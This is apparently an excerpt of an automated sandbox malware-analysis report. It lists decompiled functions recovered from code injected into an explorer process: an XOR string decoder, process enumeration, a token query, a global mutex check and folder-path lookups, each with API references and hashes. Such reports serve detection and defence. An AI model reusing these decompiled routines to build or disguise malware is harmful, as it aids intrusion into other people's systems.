                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b31
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b31
                                                                                                                                                                        0x007a8ae4
                                                                                                                                                                        0x007a8ae6
                                                                                                                                                                        0x007a8aec
                                                                                                                                                                        0x007a8af8
                                                                                                                                                                        0x007a8afe
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b00
                                                                                                                                                                        0x007a8b03
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b05
                                                                                                                                                                        0x007a8b09
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                        • String ID: GetCurrentProcess$Z
                                                                                                                                                                        • API String ID: 1659193697-210115490
                                                                                                                                                                        • Opcode ID: 6e64c7b31150ea1428e5e3ed53aa34c56d10be4b9c2984af1be60379a0514511
                                                                                                                                                                        • Instruction ID: 1b4e2697f36822799f9a5c8267a27d90ff064df5f1e1d984052d543eb972018d
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e64c7b31150ea1428e5e3ed53aa34c56d10be4b9c2984af1be60379a0514511
                                                                                                                                                                        • Instruction Fuzzy Hash: C4210CB5B002555BCB15CFA988406ADB7A6FFCA350F284279E9519B341DA78DC0387A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A89EF Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 93stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 582 7a89ef-7a8a10 583 7a8a38-7a8a48 582->583 584 7a8a12-7a8a2a 582->584 587 7a8a4a-7a8a4f 583->587 588 7a8a58-7a8a5c 583->588 585 7a8a2c-7a8a30 584->585 586 7a8a34-7a8a36 584->586 585->584 591 7a8a32 585->591 586->583 587->587 592 7a8a51-7a8a56 587->592 589 7a8a6a-7a8a76 lstrlenA 588->589 590 7a8a5e-7a8a68 588->590 593 7a8aba 589->593 594 7a8a78-7a8a7c call 7a8bde 589->594 590->589 590->590 591->583 592->588 592->590 596 7a8abf 593->596 597 7a8a81-7a8a89 594->597 598 7a8ac1-7a8ac5 596->598 599 7a8a8b-7a8a90 597->599 600 7a8a92-7a8a9a 597->600 599->598 601 7a8a9c-7a8ab3 600->601 601->601 602 7a8ab5-7a8ab8 601->602 602->596
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E007A89EF(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v28;
				char _v32;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t54;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				void* _t63;
				void* _t73;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				signed int _t79;
				void* _t80;

				_t77 = _a12;
				_v8 = __ecx;
				_t57 = 0;
				_v12 = __edx;
				_t54 = 0;
				_v16 = 0x5a;
				if(_t77 < __edx) {
					while(1) {
						_t74 = 0x5a;
						_t76 = _a12;
						if( *((intOrPtr*)(_t77 % _t74 + _a4)) ==  *((intOrPtr*)(_t77 + _v8))) {
							break;
						}
						_t77 = _t77 + 1;
						if(_t77 < _v12) {
							continue;
						} else {
						}
						goto L5;
					}
					_t54 = _t77 - _t76;
				}
				L5:
				_t39 = _t57;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				if(_v28 == _t39) {
					L8:
					_t63 = _t39;
					if(_t63 != 0) {
						goto L9;
					}
				} else {
					do {
						_t39 = _t39 + 1;
					} while ( *((intOrPtr*)(_t80 + _t39 - 0x18)) != _t57);
					_t63 = 0xe;
					if(_t39 > _t63) {
						do {
							L9:
							_t19 = _t57 + 0x30; // 0x30
							 *((char*)(_t80 + _t57 - 0x1c)) = _t19;
							_t57 = _t57 + 1;
						} while (_t57 < _t63);
					} else {
						goto L8;
					}
				}
				lstrlenA( &_v32);
				if(_t54 == 0) {
					_t58 = 0x7bf896;
					goto L17;
				} else {
					_t23 = _t54 + 1; // 0x1
					_t44 = E007A8BDE(_t23); // executed
					_t60 = _t44;
					_v12 = _t60;
					if(_t60 != 0) {
						_t79 = _a12;
						_t61 = _v8;
						_t73 = _t60 - _t79;
						do {
							 *(_t73 + _t79) =  *(_t79 % _v16 + _a4) ^  *(_t79 + _t61);
							_t79 = _t79 + 1;
							_t54 = _t54 - 1;
						} while (_t54 != 0);
						_t58 = _v12;
						L17:
						_t42 = _t58;
					} else {
						_t42 = 0x7bf896;
					}
				}
				return _t42;
			}























                                                                                                                                                                        0x007a89f7
                                                                                                                                                                        0x007a89fc
                                                                                                                                                                        0x007a89ff
                                                                                                                                                                        0x007a8a01
                                                                                                                                                                        0x007a8a04
                                                                                                                                                                        0x007a8a06
                                                                                                                                                                        0x007a8a10
                                                                                                                                                                        0x007a8a12
                                                                                                                                                                        0x007a8a18
                                                                                                                                                                        0x007a8a24
                                                                                                                                                                        0x007a8a2a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8a2c
                                                                                                                                                                        0x007a8a30
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8a32
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8a30
                                                                                                                                                                        0x007a8a36
                                                                                                                                                                        0x007a8a36
                                                                                                                                                                        0x007a8a38
                                                                                                                                                                        0x007a8a40
                                                                                                                                                                        0x007a8a42
                                                                                                                                                                        0x007a8a43
                                                                                                                                                                        0x007a8a44
                                                                                                                                                                        0x007a8a48
                                                                                                                                                                        0x007a8a58
                                                                                                                                                                        0x007a8a58
                                                                                                                                                                        0x007a8a5c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8a4a
                                                                                                                                                                        0x007a8a4a
                                                                                                                                                                        0x007a8a4a
                                                                                                                                                                        0x007a8a4b
                                                                                                                                                                        0x007a8a53
                                                                                                                                                                        0x007a8a56
                                                                                                                                                                        0x007a8a5e
                                                                                                                                                                        0x007a8a5e
                                                                                                                                                                        0x007a8a5e
                                                                                                                                                                        0x007a8a61
                                                                                                                                                                        0x007a8a65
                                                                                                                                                                        0x007a8a66
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8a56
                                                                                                                                                                        0x007a8a6e
                                                                                                                                                                        0x007a8a76
                                                                                                                                                                        0x007a8aba
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8a78
                                                                                                                                                                        0x007a8a78
                                                                                                                                                                        0x007a8a7c
                                                                                                                                                                        0x007a8a82
                                                                                                                                                                        0x007a8a84
                                                                                                                                                                        0x007a8a89
                                                                                                                                                                        0x007a8a92
                                                                                                                                                                        0x007a8a97
                                                                                                                                                                        0x007a8a9a
                                                                                                                                                                        0x007a8a9c
                                                                                                                                                                        0x007a8aac
                                                                                                                                                                        0x007a8aaf
                                                                                                                                                                        0x007a8ab0
                                                                                                                                                                        0x007a8ab0
                                                                                                                                                                        0x007a8ab5
                                                                                                                                                                        0x007a8abf
                                                                                                                                                                        0x007a8abf
                                                                                                                                                                        0x007a8a8b
                                                                                                                                                                        0x007a8a8b
                                                                                                                                                                        0x007a8a8b
                                                                                                                                                                        0x007a8a89
                                                                                                                                                                        0x007a8ac5

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000138,?,007BCA50), ref: 007A8A6E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                        • String ID: Research$Z
                                                                                                                                                                        • API String ID: 1659193697-3866491824
                                                                                                                                                                        • Opcode ID: 95d2f7bdd901afd07cdc1a9a6ed32d9c8de5e1d21fadcddafd259599d5fbd071
                                                                                                                                                                        • Instruction ID: bd1abba8078e594b08daa14a4a15e64934b9a10bb155cdcc9565570ed6b262e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 95d2f7bdd901afd07cdc1a9a6ed32d9c8de5e1d21fadcddafd259599d5fbd071
                                                                                                                                                                        • Instruction Fuzzy Hash: F131E935B042459FCF58DEAC84401AEBBB6BFDA310F28C67AE945E7341DA34ED428791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB96A Relevance: 4.6, APIs: 3, Instructions: 66processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E007AB96A(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t25;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E007A8D6D( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						_t25 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t25 + 0x30))(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}













                                                                                                                                                                        0x007ab982
                                                                                                                                                                        0x007ab984
                                                                                                                                                                        0x007ab988
                                                                                                                                                                        0x007ab98b
                                                                                                                                                                        0x007ab98d
                                                                                                                                                                        0x007ab992
                                                                                                                                                                        0x007ab9a1
                                                                                                                                                                        0x007ab9a9
                                                                                                                                                                        0x007ab9bd
                                                                                                                                                                        0x007ab9cd
                                                                                                                                                                        0x007ab9d7
                                                                                                                                                                        0x007ab9db
                                                                                                                                                                        0x007ab9f2
                                                                                                                                                                        0x007ab9f8
                                                                                                                                                                        0x007ab9ff
                                                                                                                                                                        0x007ab9bf
                                                                                                                                                                        0x007ab9bf
                                                                                                                                                                        0x007ab9c5
                                                                                                                                                                        0x007ab9ca
                                                                                                                                                                        0x007ab9ca
                                                                                                                                                                        0x007ab9bd
                                                                                                                                                                        0x007aba08

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 007AB988
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 007AB9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 007AB9EB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CreateFirstNextSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3349827152-0
                                                                                                                                                                        • Opcode ID: 98cb6cc3500879afd9d7b3187c78b579499ba9d60d1546e99ec9dbd4dd2af08e
                                                                                                                                                                        • Instruction ID: 6d8e11b72cd36d6eef1ee39e1a81f14d1322c3eac5d27be8089f2a99fac2f3c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 98cb6cc3500879afd9d7b3187c78b579499ba9d60d1546e99ec9dbd4dd2af08e
                                                                                                                                                                        • Instruction Fuzzy Hash: E2119072204701AFC310DB68EC49E9B77ECEF8A760F144B39F665C7191EB28D90587A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AC7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E007AC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E007A8BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E007A8BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                        0x007ac7f8
                                                                                                                                                                        0x007ac7f9
                                                                                                                                                                        0x007ac800
                                                                                                                                                                        0x007ac808
                                                                                                                                                                        0x007ac80c
                                                                                                                                                                        0x007ac815
                                                                                                                                                                        0x007ac85b
                                                                                                                                                                        0x007ac85b
                                                                                                                                                                        0x007ac822
                                                                                                                                                                        0x007ac82a
                                                                                                                                                                        0x007ac82c
                                                                                                                                                                        0x007ac832
                                                                                                                                                                        0x007ac84b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ac84d
                                                                                                                                                                        0x007ac852
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ac858
                                                                                                                                                                        0x007ac834
                                                                                                                                                                        0x007ac834
                                                                                                                                                                        0x007ac834
                                                                                                                                                                        0x007ac834
                                                                                                                                                                        0x007ac832
                                                                                                                                                                        0x007ac861

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,007A0000,00000000,00000000,?,007AC876,00000000,00000000,?,007AC89F), ref: 007AC810
                                                                                                                                                                        • GetLastError.KERNEL32(?,007AC876,00000000,00000000,?,007AC89F,00001644,?,007ADFCE), ref: 007AC817
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,007AC876,00000000,00000000,?,007AC89F,00001644,?,007ADFCE), ref: 007AC846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: 6b4250790e0ed80806d034de4bc43dff0485ebedd80cc539e208f426f0967053
                                                                                                                                                                        • Instruction ID: 19a570ab30880e69aad331def1ebfe9635656f984203e342f8a75d9ba6e4d8dd
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b4250790e0ed80806d034de4bc43dff0485ebedd80cc539e208f426f0967053
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E0167B2600118BF8B255BA5DC49DAB7FECFF867A07100669F605D6110D67CDD00D7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A5ED4 Relevance: 4.5, APIs: 3, Instructions: 45synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E007A5ED4(signed int __eax, CHAR* __ecx, void* __edx) {
				intOrPtr* _v0;
				signed int _t9;
				intOrPtr _t11;
				void* _t20;
				void* _t23;

				_pop(_t25);
				_t20 = __edx;
				if(__ecx != 0) {
					_t23 = CreateMutexA(0, 1, __ecx);
					if(_t23 != 0) {
						if(GetLastError() != 0xb7 || E007AB149(_t23, _t20) != 0xffffffff) {
							_t9 = 1;
							 *_v0 = _t23;
						} else {
							_t11 =  *0x7bf818; // 0xeaf6c8
							 *((intOrPtr*)(_t11 + 0x30))(_t23);
							_t9 = 0;
						}
					} else {
						_t9 = GetLastError() | 0xffffffff;
					}
				} else {
					_t9 = __eax | 0xffffffff;
				}
				return _t9;
			}








                                                                                                                                                                        0x007a5ed7
                                                                                                                                                                        0x007ab0e8
                                                                                                                                                                        0x007ab0ec
                                                                                                                                                                        0x007ab104
                                                                                                                                                                        0x007ab108
                                                                                                                                                                        0x007ab120
                                                                                                                                                                        0x007ab142
                                                                                                                                                                        0x007ab143
                                                                                                                                                                        0x007ab130
                                                                                                                                                                        0x007ab130
                                                                                                                                                                        0x007ab136
                                                                                                                                                                        0x007ab139
                                                                                                                                                                        0x007ab139
                                                                                                                                                                        0x007ab10a
                                                                                                                                                                        0x007ab110
                                                                                                                                                                        0x007ab110
                                                                                                                                                                        0x007ab0ee
                                                                                                                                                                        0x007ab0ee
                                                                                                                                                                        0x007ab0ee
                                                                                                                                                                        0x007ab148

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,007A5F36,?,Global,007BCA40,?,00000000,?,00000001), ref: 007AB0FE
                                                                                                                                                                        • GetLastError.KERNEL32(?,007A5F36,?,Global,007BCA40,?,00000000,?,00000001), ref: 007AB10A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1925916568-0
                                                                                                                                                                        • Opcode ID: 6bf1827c8684c8706252edea4276c441a5452ac8a8fec61293e48f9c28bc539e
                                                                                                                                                                        • Instruction ID: 60461dd948e589923b528ebaccc43e49303292668bb9a8f2f444333d451ab395
                                                                                                                                                                        • Opcode Fuzzy Hash: 6bf1827c8684c8706252edea4276c441a5452ac8a8fec61293e48f9c28bc539e
                                                                                                                                                                        • Instruction Fuzzy Hash: C1F022712045089BC7201779EC69B6A36D8EFCB7BAF504775F63ACA1D2EB28C8014391
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB096 Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB096(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E007AB149(_t17, _t16) < 0) {
						_t8 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






                                                                                                                                                                        0x007ab0a2
                                                                                                                                                                        0x007ab0aa
                                                                                                                                                                        0x007ab0ae
                                                                                                                                                                        0x007ab0c5
                                                                                                                                                                        0x007ab0d4
                                                                                                                                                                        0x007ab0da
                                                                                                                                                                        0x007ab0dd
                                                                                                                                                                        0x007ab0dd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab0df
                                                                                                                                                                        0x007ab0b0
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,007A5047,?,?,?,?,?,?,007A53E7,00000000,00000000), ref: 007AB0A4
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,007A53E7,00000000,00000000), ref: 007AB0B0
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,007A53E7,00000000,00000000), ref: 007AB0BA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 200418032-0
                                                                                                                                                                        • Opcode ID: 06b516c0f26b99a68144a40d67af66c847d5090cb235a3d046cb4a1aaf63821d
                                                                                                                                                                        • Instruction ID: 603351b50b40886a91d9e5a74d5c5697b432191d0adc5e912ff1b835eea8eabc
                                                                                                                                                                        • Opcode Fuzzy Hash: 06b516c0f26b99a68144a40d67af66c847d5090cb235a3d046cb4a1aaf63821d
                                                                                                                                                                        • Instruction Fuzzy Hash: F7F0A9313040219BC3202765AC09FAB26AADFC9BA0F028360FA15CB152DB28CC824290
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007ABE3C Relevance: 3.8, APIs: 3, Instructions: 72stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E007ABE3C(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x7bf82c; // 0xeaf9c8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E007AC79E(_t39);
				_t26 =  *0x7bf84c; // 0xeaf9d8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x7bf81c; // 0x7d0000
					if(E007AC9F4( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x7bf82c; // 0xeaf9c8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x7bf818; // 0xeaf6c8
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E007AA456( &_v528) * 2, 0x104);
				return 1;
			}
















                                                                                                                                                                        0x007abe3c
                                                                                                                                                                        0x007abe4d
                                                                                                                                                                        0x007abe5f
                                                                                                                                                                        0x007abe61
                                                                                                                                                                        0x007abe6f
                                                                                                                                                                        0x007abe7e
                                                                                                                                                                        0x007abe89
                                                                                                                                                                        0x007abe91
                                                                                                                                                                        0x007abe9e
                                                                                                                                                                        0x007abea4
                                                                                                                                                                        0x007abea8
                                                                                                                                                                        0x007abeaa
                                                                                                                                                                        0x007abebe
                                                                                                                                                                        0x007abec7
                                                                                                                                                                        0x007abed2
                                                                                                                                                                        0x007abed2
                                                                                                                                                                        0x007abebe
                                                                                                                                                                        0x007abed5
                                                                                                                                                                        0x007abedc
                                                                                                                                                                        0x007abefa
                                                                                                                                                                        0x007abf07

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 007ABE61
                                                                                                                                                                        • memset.MSVCRT ref: 007ABE6F
                                                                                                                                                                          • Part of subcall function 007AC79E: GetCurrentThread.KERNEL32 ref: 007AC7B1
                                                                                                                                                                          • Part of subcall function 007AC79E: GetLastError.KERNEL32(?,?,007AC8E3,00000000,007A0000), ref: 007AC7BF
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 007ABEFA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$CurrentErrorLastThreadlstrcpyn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2264569553-0
                                                                                                                                                                        • Opcode ID: c965a8d62dae649b26210c0fdbb6cab322503f8e5eb4551f339afc07c5b41009
                                                                                                                                                                        • Instruction ID: 3215f0de82483e2dc6eb57ff3f07f2e0b0688308e8866e7fd782b037bf20024c
                                                                                                                                                                        • Opcode Fuzzy Hash: c965a8d62dae649b26210c0fdbb6cab322503f8e5eb4551f339afc07c5b41009
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D2190B2500118AFD720EBA4DC89FEA73FCEF49314F0082A5F605D7152DB789E458B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A5EDD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                        			E007A5EDD(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E007AB557( &_v52, __ecx, __eflags);
				_t16 =  *0x7bf81c; // 0x7d0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0x7bf818; // 0xeaf6c8
					 *((intOrPtr*)(_t27 + 0xc0))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E007A9A07("Global");
				_push( &_v8);
				_t19 = E007A5ED4(_t18, _t18, _t42); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					FindCloseChangeNotification(_v8);
					_v8 = 0;
					_push( &_v8);
					E007A5ED4( &_v8,  &_v52, _t42); // executed
				}
				E007A8BF4( &_v12, 0xffffffff);
				return _v8;
			}










                                                                                                                                                                        0x007a5ee5
                                                                                                                                                                        0x007a5eeb
                                                                                                                                                                        0x007a5ef1
                                                                                                                                                                        0x007a5ef6
                                                                                                                                                                        0x007a5f01
                                                                                                                                                                        0x007a5f03
                                                                                                                                                                        0x007a5f03
                                                                                                                                                                        0x007a5f0a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5f0a
                                                                                                                                                                        0x007a5f12
                                                                                                                                                                        0x007a5f16
                                                                                                                                                                        0x007a5f17
                                                                                                                                                                        0x007a5f29
                                                                                                                                                                        0x007a5f2c
                                                                                                                                                                        0x007a5f31
                                                                                                                                                                        0x007a5f39
                                                                                                                                                                        0x007a5f3c
                                                                                                                                                                        0x007a5f46
                                                                                                                                                                        0x007a5f4c
                                                                                                                                                                        0x007a5f4f
                                                                                                                                                                        0x007a5f55
                                                                                                                                                                        0x007a5f5a
                                                                                                                                                                        0x007a5f61
                                                                                                                                                                        0x007a5f6e

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,00000001), ref: 007A5F46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID: Global
                                                                                                                                                                        • API String ID: 2591292051-4020866741
                                                                                                                                                                        • Opcode ID: 6ea867de68931dfdcb426fc09526ad2af03eda0bc8958722b85d5b1c56524908
